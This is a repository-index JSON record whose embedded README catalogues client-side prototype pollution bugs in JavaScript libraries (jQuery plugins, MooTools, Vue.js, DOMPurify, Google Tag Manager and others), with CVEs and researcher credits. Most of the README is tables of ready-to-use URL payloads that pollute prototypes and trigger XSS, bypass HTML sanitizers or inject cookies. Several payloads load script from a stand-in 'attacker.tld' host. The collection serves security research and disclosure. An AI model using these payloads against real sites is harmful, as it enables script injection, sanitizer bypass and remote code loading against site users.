{"id":13527878,"url":"https://github.com/BlackFan/client-side-prototype-pollution","last_synced_at":"2025-04-01T10:32:56.627Z","repository":{"id":37752568,"uuid":"299616466","full_name":"BlackFan/client-side-prototype-pollution","owner":"BlackFan","description":"Prototype Pollution and useful Script Gadgets","archived":false,"fork":false,"pushed_at":"2024-01-27T12:22:39.000Z","size":83,"stargazers_count":1468,"open_issues_count":0,"forks_count":209,"subscribers_count":42,"default_branch":"master","last_synced_at":"2025-03-30T10:06:17.723Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/BlackFan.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-09-29T12:52:28.000Z","updated_at":"2025-03-28T20:05:40.000Z","dependencies_parsed_at":"2024-09-20T23:00:58.565Z","dependency_job_id":"63f82841-60af-49a8-bacd-bd0ae2236e9b","html_url":"https://github.com/BlackFan/client-side-prototype-pollution","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BlackFan%2Fclient-side-prototype-pollution","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BlackFan%2Fclient-side-prototype-pollution/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BlackFan%2Fclient-side-prototype-pollution/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BlackFan%2Fclient-side-prototype-pollution/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/BlackFan","download_url":"https://codeload.github.com/BlackFan/client-side-prototype-pollution/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246625735,"owners_count":20807812,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T06:02:04.813Z","updated_at":"2025-04-01T10:32:56.603Z","avatar_url":"https://github.com/BlackFan.png","language":null,"readme":"# Client-Side Prototype Pollution\r\n\r\n## Intro\r\n\r\nIf you are unfamiliar with Prototype Pollution Attack, you should read the following first: \r\n[JavaScript prototype pollution attack in NodeJS](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript_prototype_pollution_attack_in_NodeJS.pdf) by Olivier Arteau \r\n[Prototype pollution – and bypassing client-side HTML sanitizers](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) by Michał Bentkowski\r\n\r\nIn this repository, I am trying to collect examples of libraries that are vulnerable to Prototype Pollution due to `document.location` parsing and useful script gadgets that can be used to demonstrate the impact.\r\n\r\n## Prototype Pollution\r\n\r\n| Name | Payload | Refs | Found by |\r\n|----------------------------------------------------------------------------|--------------------------------------------------------------------------|---------------------------------------------|--------------------------------------------------|\r\n| Wistia Embedded Video (**Fixed**) | `?__proto__[test]=test`\u003cbr\u003e`?__proto__.test=test` | [[1]](https://hackerone.com/reports/986386) | [William Bowling](https://twitter.com/wcbowling) |\r\n| [jQuery query-object plugin](/pp/jquery-query-object.md)\u003cbr\u003eCVE-2021-20083 | `?__proto__[test]=test`\u003cbr\u003e`#__proto__[test]=test` | | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [jQuery Sparkle](/pp/jquery-sparkle.md)\u003cbr\u003eCVE-2021-20084 | `?__proto__.test=test`\u003cbr\u003e`?constructor.prototype.test=test` | | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [V4Fire Core Library](/pp/v4fire-core.md) | `?__proto__.test=test`\u003cbr\u003e`?__proto__[test]=test`\u003cbr\u003e`?__proto__[test]={\"json\":\"value\"}`| | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [backbone-query-parameters](/pp/backbone-qp.md)\u003cbr\u003eCVE-2021-20085 | `?__proto__.test=test`\u003cbr\u003e`?constructor.prototype.test=test`\u003cbr\u003e`?__proto__.array=1\\|2\\|3`| [[1]](https://bugcrowd.com/disclosures/57b28008-4653-4dec-88c3-4d38e40023ff/toolbox-teslamotors-com-html-injection-via-prototype-pollution-potential-xss) | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [jQuery BBQ](/pp/jquery-bbq.md)\u003cbr\u003eCVE-2021-20086 | `?__proto__[test]=test`\u003cbr\u003e`?constructor[prototype][test]=test` | | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [jquery-deparam](/pp/jquery-deparam.md)\u003cbr\u003eCVE-2021-20087 | `?__proto__[test]=test`\u003cbr\u003e`?constructor[prototype][test]=test` | | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [MooTools More](/pp/mootools-more.md)\u003cbr\u003eCVE-2021-20088 | `?__proto__[test]=test`\u003cbr\u003e`?constructor[prototype][test]=test` | | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [Swiftype Site Search](/pp/swiftype-site-search.md) (**Fixed**) | `#__proto__[test]=test` | [[1]](https://hackerone.com/reports/998398) | [s1r1us](https://twitter.com/S1r1u5_) |\r\n| [CanJS deparam](/pp/canjs-deparam.md) | `?__proto__[test]=test`\u003cbr\u003e`?constructor[prototype][test]=test` | | [Rahul Maini](https://twitter.com/iamnoooob) |\r\n| [Purl (jQuery-URL-Parser)](/pp/purl.md)\u003cbr\u003eCVE-2021-20089 | `?__proto__[test]=test`\u003cbr\u003e`?constructor[prototype][test]=test`\u003cbr\u003e`#__proto__[test]=test`| | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [HubSpot Tracking Code](/pp/hubspot.md) (**Fixed**) | `?__proto__[test]=test`\u003cbr\u003e`?constructor[prototype][test]=test`\u003cbr\u003e`#__proto__[test]=test`| | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [YUI 3 querystring-parse](/pp/yui3.md) | `?constructor[prototype][test]=test` | | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [Mutiny](/pp/mutiny.md) (**Fixed**) | `?__proto__.test=test` | | [SPQR](https://twitter.com/amlnspqr) |\r\n| [jQuery parseParams](/pp/jquery-parseparam.md) | `?__proto__.test=test`\u003cbr\u003e`?constructor.prototype.test=test` | | [POSIX](https://twitter.com/po6ix) |\r\n| [php.js parse_str](/pp/parse_str.md) | `?__proto__[test]=test`\u003cbr\u003e`?constructor[prototype][test]=test` | | [POSIX](https://twitter.com/po6ix) |\r\n| [arg.js](/pp/arg-js.md) | `?__proto__[test]=test`\u003cbr\u003e`?__proto__.test=test`\u003cbr\u003e`?constructor[prototype][test]=test`\u003cbr\u003e`#__proto__[test]=test`| | [POSIX](https://twitter.com/po6ix) |\r\n| [davis.js](/pp/davis-js.md) | `?__proto__[test]=test` | | [POSIX](https://twitter.com/po6ix) |\r\n| [Component querystring](/pp/component_querystring.md) | `?__proto__[NUMBER]=test`\u003cbr\u003e`?__proto__[123]=test` | | [Masato Kinugawa](https://twitter.com/kinugawamasato)|\r\n| [Aurelia path](/pp/aurelia.md) | `?__proto__[test]=test` | [[1]](https://github.com/aurelia/path/issues/44) | [s1r1us](https://twitter.com/S1r1u5_) |\r\n| [analytics-utils \u003c 1.0.3](/pp/analytics-utils.md) | `?__proto__[test]=test`\u003cbr\u003e`?constructor[prototype][test]=test` | [[1]](https://github.com/DavidWells/analytics/issues/204) | [alexdaviestray](https://github.com/alexdaviestray) |\r\n\r\n## Script Gadgets\r\n\r\n| Name | Payload | Impact | Refs | Found by |\r\n|---------------------------------------------------------|-------------------------------------------------------------------------------|-------------------|---------------------------------------------------|-----------------------------------------------------|\r\n| [Wistia Embedded Video](/gadgets/wistia-video.md) | `?__proto__[innerHTML]=\u003cimg/src/onerror%3dalert(1)\u003e` | XSS | [[1]](https://hackerone.com/reports/986386) | [William Bowling](https://twitter.com/wcbowling) |\r\n| [jQuery $.get](/gadgets/jquery.md#get-jquery-all-versions) | `?__proto__[context]=\u003cimg/src/onerror%3dalert(1)\u003e`\u003cbr\u003e`\u0026__proto__[jquery]=x`| XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [jQuery $.get \u003e= 3.0.0](/gadgets/jquery.md#get-jquery--300)\u003cbr\u003eBoolean.prototype | `?__proto__[url][]=data:,alert(1)//`\u003cbr\u003e`\u0026__proto__[dataType]=script` | XSS | | [Michał Bentkowski](https://twitter.com/SecurityMB) |\r\n| [jQuery $.get \u003e= 3.0.0](/gadgets/jquery.md#get-jquery--300-1)\u003cbr\u003eBoolean.prototype | `?__proto__[url]=data:,alert(1)//`\u003cbr\u003e`\u0026__proto__[dataType]=script`\u003cbr\u003e`\u0026__proto__[crossDomain]=`| XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [jQuery $.getScript \u003e= 3.4.0](/gadgets/jquery.md#getscript-jquery--340) | `?__proto__[src][]=data:,alert(1)//` | XSS | | [s1r1us](https://twitter.com/S1r1u5_) |\r\n| [jQuery $.getScript 3.0.0 - 3.3.1](/gadgets/jquery.md#getscript-jquery-300---331)\u003cbr\u003eBoolean.prototype | `?__proto__[url]=data:,alert(1)//` | XSS | | [s1r1us](https://twitter.com/S1r1u5_) |\r\n| [jQuery $(html)](/gadgets/jquery.md#html-jquery-all-versions) | `?__proto__[div][0]=1`\u003cbr\u003e`\u0026__proto__[div][1]=\u003cimg/src/onerror%3dalert(1)\u003e`| XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [jQuery $(x).off](/gadgets/jquery.md#xoff-jquery-all-versions)\u003cbr\u003eString.prototype | `?__proto__[preventDefault]=x`\u003cbr\u003e`\u0026__proto__[handleObj]=x`\u003cbr\u003e`\u0026__proto__[delegateTarget]=\u003cimg/src/onerror%3dalert(1)\u003e`| XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [jQuery $(x).attr](/gadgets/jquery.md#xattr-jquery--180) | `?__proto__[OnError]=alert(1)`\u003cbr\u003e`\u0026__proto__[SRC]=fakeimagewontload.jpg` | XSS | [[1]](https://joaxcar.com/blog/2024/01/26/hunting-for-prototype-pollution-gadgets-in-jquery-intigriti-0124-challenge/) [[2]](https://mizu.re/post/intigriti-january-2024-xss-challenge) | [Johan Carlsson](https://twitter.com/joaxcar) |\r\n| [jQuery \u003cspan\u003e$\u003c/span\u003e(x).on, \u003cspan\u003e$\u003c/span\u003e(x).submit](/gadgets/jquery.md#xon-xsubmit-jquery--190) | `?__proto__[handler][]=x`\u003cbr\u003e`\u0026__proto__[selector][]=\u003cimg/src/onerror%3Dalert(1)\u003e`\u003cbr\u003e`\u0026__proto__[focus]=x`\u003cbr\u003e`\u0026__proto__[needsContext]=x` | XSS | [[1]](https://joaxcar.com/blog/2024/01/26/hunting-for-prototype-pollution-gadgets-in-jquery-intigriti-0124-challenge/) | [Johan Carlsson](https://twitter.com/joaxcar) |\r\n| [Google reCAPTCHA](/gadgets/recaptcha.md) | `?__proto__[srcdoc][]=\u003cscript\u003ealert(1)\u003c/script\u003e` | XSS | | [s1r1us](https://twitter.com/S1r1u5_) |\r\n| [Twitter Universal Website Tag](/gadgets/twitter-uwt.md) (**Fixed**)| `?__proto__[hif][]=javascript:alert(1)` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [Tealium Universal Tag](/gadgets/tealium-utag.md) | `?__proto__[attrs][src]=1`\u003cbr\u003e`\u0026__proto__[src]=data:,alert(1)//` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [Akamai Boomerang](/gadgets/akamai-boomerang.md) | `?__proto__[BOOMR]=1`\u003cbr\u003e`\u0026__proto__[url]=//attacker.tld/js.js` | XSS | | [s1r1us](https://twitter.com/S1r1u5_) |\r\n| [Lodash \u003c= 4.17.15](/gadgets/lodash.md) | `?__proto__[sourceURL]=%E2%80%A8%E2%80%A9alert(1)` | XSS | [[1]](https://github.com/lodash/lodash/pull/4518) | [Alex Brasetvik](https://twitter.com/alexbrasetvik) |\r\n| [sanitize-html](/gadgets/sanitize-html.md) | `?__proto__[*][]=onload` | Bypass | [[1]](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) | [Michał Bentkowski](https://twitter.com/SecurityMB) |\r\n| [sanitize-html](/gadgets/sanitize-html.md) | `?__proto__[innerText]=\u003cscript\u003ealert(1)\u003c/script\u003e` | Bypass | [[1]](https://github.com/apostrophecms/sanitize-html/commit/0fe551c2c6fac1277c0b9688263bd61acc52baf8)| [Hpdoger](https://twitter.com/hpdoger) |\r\n| [js-xss](/gadgets/js-xss.md) | `?__proto__[whiteList][img][0]=onerror`\u003cbr\u003e`\u0026__proto__[whiteList][img][1]=src`| Bypass | [[1]](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) | [Michał Bentkowski](https://twitter.com/SecurityMB) |\r\n| [DOMPurify \u003c= 2.0.12](/gadgets/dompurify.md) | `?__proto__[ALLOWED_ATTR][0]=onerror`\u003cbr\u003e`\u0026__proto__[ALLOWED_ATTR][1]=src` | Bypass | [[1]](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) | [Michał Bentkowski](https://twitter.com/SecurityMB) |\r\n| [DOMPurify \u003c= 2.0.12](/gadgets/dompurify.md) | `?__proto__[documentMode]=9` | Bypass | [[1]](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) | [Michał Bentkowski](https://twitter.com/SecurityMB) |\r\n| [Google Closure](/gadgets/closure.md) | `?__proto__[*%20ONERROR]=1`\u003cbr\u003e`\u0026__proto__[*%20SRC]=1` | Bypass | [[1]](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) | [Michał Bentkowski](https://twitter.com/SecurityMB) |\r\n| [Google Closure](/gadgets/closure.md) | `?__proto__[CLOSURE_BASE_PATH]=data:,alert(1)//` | XSS | [[1]](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) | [Michał Bentkowski](https://twitter.com/SecurityMB) |\r\n| [Marionette.js / Backbone.js](/gadgets/marionette.md) | `?__proto__[tagName]=img`\u003cbr\u003e`\u0026__proto__[src][]=x:`\u003cbr\u003e`\u0026__proto__[onerror][]=alert(1)` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [Adobe Dynamic Tag Management](/gadgets/adobe-dtm.md) | `?__proto__[src]=data:,alert(1)//` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [Adobe Dynamic Tag Management](/gadgets/adobe-dtm.md) | `?__proto__[SRC]=\u003cimg/src/onerror%3dalert(1)\u003e` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [Swiftype Site Search](/gadgets/swiftype-site-search.md)| `?__proto__[xxx]=alert(1)` | XSS | | [s1r1us](https://twitter.com/S1r1u5_) |\r\n| [Embedly Cards](/gadgets/embedly.md) | `?__proto__[onload]=alert(1)` | XSS | | [Guilherme Keerok](https://twitter.com/k33r0k) |\r\n| [Segment Analytics.js](/gadgets/segment-analytics.md) | `?__proto__[script][0]=1`\u003cbr\u003e`\u0026__proto__[script][1]=\u003cimg/src/onerror%3dalert(1)\u003e`| XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [Knockout.js](/gadgets/knockout.md)\u003cbr\u003eArray.prototype | `?__proto__[4]=a':1,[alert(1)]:1,'b`\u003cbr\u003e`\u0026__proto__[5]=,` | XSS | | [Michał Bentkowski](https://twitter.com/SecurityMB) |\r\n| [Zepto.js](/gadgets/zepto.md) | `?__proto__[onerror]=alert(1)` | XSS | [[1]](https://xz.aliyun.com/t/8552) | [lih3iu](https://twitter.com/lih3iu) |\r\n| [Zepto.js](/gadgets/zepto.md) | `?__proto__[html]=\u003cimg/src/onerror%3dalert(1)\u003e` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [Sprint.js](/gadgets/sprint.md) | `?__proto__[div][intro]=\u003cimg%20src%20onerror%3dalert(1)\u003e` | XSS | [[1]](https://xz.aliyun.com/t/8552) | [lih3iu](https://twitter.com/lih3iu) |\r\n| [Vue.js](/gadgets/vuejs.md) | `?__proto__[v-if]=_c.constructor('alert(1)')()` | XSS | | [POSIX](https://twitter.com/po6ix) |\r\n| [Vue.js](/gadgets/vuejs.md) | `?__proto__[attrs][0][name]=src`\u003cbr\u003e`\u0026__proto__[attrs][0][value]=xxx`\u003cbr\u003e`\u0026__proto__[xxx]=data:,alert(1)//`\u003cbr\u003e`\u0026__proto__[is]=script` | XSS | [[1]](https://blog.s1r1us.ninja/CTF/zer0ptsctf2021-challenges) | [s1r1us](https://twitter.com/S1r1u5_) |\r\n| [Vue.js](/gadgets/vuejs.md) | `?__proto__[v-bind:class]=''.constructor.constructor('alert(1)')()` | XSS | [[1]](https://blog.s1r1us.ninja/CTF/zer0ptsctf2021-challenges) | [r00timentary](https://ctftime.org/team/32783) |\r\n| [Vue.js](/gadgets/vuejs.md) | `?__proto__[data]=a`\u003cbr\u003e`\u0026__proto__[template][nodeType]=a`\u003cbr\u003e`\u0026__proto__[template][innerHTML]=\u003cscript\u003ealert(1)\u003c/script\u003e` | XSS | [[1]](https://blog.s1r1us.ninja/CTF/zer0ptsctf2021-challenges) | [SuperGuesser](https://twitter.com/SuperGuesser) |\r\n| [Vue.js](/gadgets/vuejs.md) | `?__proto__[props][][value]=a`\u003cbr\u003e`\u0026__proto__[name]=\":''.constructor.constructor('alert(1)')(),\"` | XSS | [[1]](https://blog.s1r1us.ninja/CTF/zer0ptsctf2021-challenges) | [st98_](https://twitter.com/st98_) |\r\n| [Vue.js](/gadgets/vuejs.md) | `?__proto__[template]=\u003cscript\u003ealert(1)\u003c/script\u003e` | XSS | [[1]](https://github.com/aszx87410/ctf-writeups/issues/24) | [huli](https://github.com/aszx87410/) |\r\n| [Demandbase Tag](/gadgets/demandbase-tag.md) | `?__proto__[Config][SiteOptimization][enabled]=1`\u003cbr\u003e`\u0026__proto__[Config][SiteOptimization][recommendationApiURL]=//attacker.tld/json_cors.php?` | XSS | | [SPQR](https://twitter.com/amlnspqr) |\r\n| [@analytics/google-tag-manager](/gadgets/analytics-google-tag-manager.md) | `?__proto__[customScriptSrc]=//attacker.tld/xss.js` | XSS | | [SPQR](https://twitter.com/amlnspqr) |\r\n| [i18next](/gadgets/i18next.md) | `?__proto__[lng]=cimode`\u003cbr\u003e`\u0026__proto__[appendNamespaceToCIMode]=x`\u003cbr\u003e`\u0026__proto__[nsSeparator]=\u003cimg/src/onerror%3dalert(1)\u003e` | Potential XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [i18next \u003c 19.8.5](/gadgets/i18next.md) | `?__proto__[lng]=a`\u003cbr\u003e`\u0026__proto__[a]=b`\u003cbr\u003e`\u0026__proto__[obj]=c`\u003cbr\u003e`\u0026__proto__[k]=d`\u003cbr\u003e`\u0026__proto__[d]=\u003cimg/src/onerror%3dalert(1)\u003e` | Potential XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [i18next \u003e= 19.8.5](/gadgets/i18next.md) | `?__proto__[lng]=a`\u003cbr\u003e`\u0026__proto__[key]=\u003cimg/src/onerror%3dalert(1)\u003e` | Potential XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [Google Analytics](/gadgets/google-analytics.md) | `?__proto__[cookieName]=COOKIE%3DInjection%3B` | Cookie Injection | | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [Popper.js](/gadgets/popper.md) | `?__proto__[arrow][style]=color:red;transition:all%201s`\u003cbr\u003e`\u0026__proto__[arrow][ontransitionend]=alert(1)`\u003cbr\u003e\u003cbr\u003e`?__proto__[reference][style]=color:red;transition:all%201s`\u003cbr\u003e`\u0026__proto__[reference][ontransitionend]=alert(2)`\u003cbr\u003e\u003cbr\u003e`?__proto__[popper][style]=color:red;transition:all%201s`\u003cbr\u003e`\u0026__proto__[popper][ontransitionend]=alert(3)` | XSS | [[1]](https://github.com/aszx87410/ctf-writeups/issues/36) [[2]](https://lemonslab.me/posts/small-talk-writeup/) | [Matheus Vrech](https://twitter.com/vrechson) |\r\n| [Pendo Agent](/gadgets/pendo-agent.md) | `?__proto__[dataHost]=attacker.tld/js.js%23` | XSS | | [Renwa](https://twitter.com/RenwaX23) |\r\n| [script.aculo.us](/gadgets/scriptaculous.md)\u003cbr\u003eString.constructor | `?x=x`\u003cbr\u003e`\u0026x[constructor][__parseStyleElement][innerHTML]=\u003cimg/src/onerror%3dalert(1)\u003e` | XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) |\r\n| [hCaptcha](/gadgets/hcaptcha.md) (**Fixed**) | `?__proto__[assethost]=javascript:alert(1)//` | XSS | | [Masato Kinugawa](https://twitter.com/kinugawamasato) |\r\n| [Google Closure](/gadgets/closure.md) | `?__proto__[trustedTypes]=x`\u003cbr\u003e`\u0026__proto__[emptyHTML]=\u003cimg/src/onerror%3dalert(1)\u003e`| XSS | | [Mathias Karlsson](https://twitter.com/avlidienbrunn) |\r\n| [Google Tag Manager](/gadgets/google-tag-manager.md) | `?__proto__[vtp_enableRecaptcha]=1`\u003cbr\u003e`\u0026__proto__[srcdoc]=\u003cscript\u003ealert(1)\u003c/script\u003e`| XSS | | [terjanq](https://twitter.com/terjanq) |\r\n| [Google Tag Manager](/gadgets/google-tag-manager.md) | `?__proto__[q][0][0]=require`\u003cbr\u003e`\u0026__proto__[q][0][1]=x`\u003cbr\u003e`\u0026__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7`| XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) /\u003cbr\u003e[Masato Kinugawa](https://twitter.com/kinugawamasato) |\r\n| [Google Analytics](/gadgets/google-analytics.md) | `?__proto__[q][0][0]=require`\u003cbr\u003e`\u0026__proto__[q][0][1]=x`\u003cbr\u003e`\u0026__proto__[q][0][2]=https://www.google-analytics.com/gtm/js%3Fid%3DGTM-WXTDWH7`| XSS | | [Sergey Bobrov](https://twitter.com/Black2Fan) /\u003cbr\u003e[Masato Kinugawa](https://twitter.com/kinugawamasato) |\r\n","funding_links":[],"categories":["Others","miscellaneous"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FBlackFan%2Fclient-side-prototype-pollution","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FBlackFan%2Fclient-side-prototype-pollution","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FBlackFan%2Fclient-side-prototype-pollution/lists"}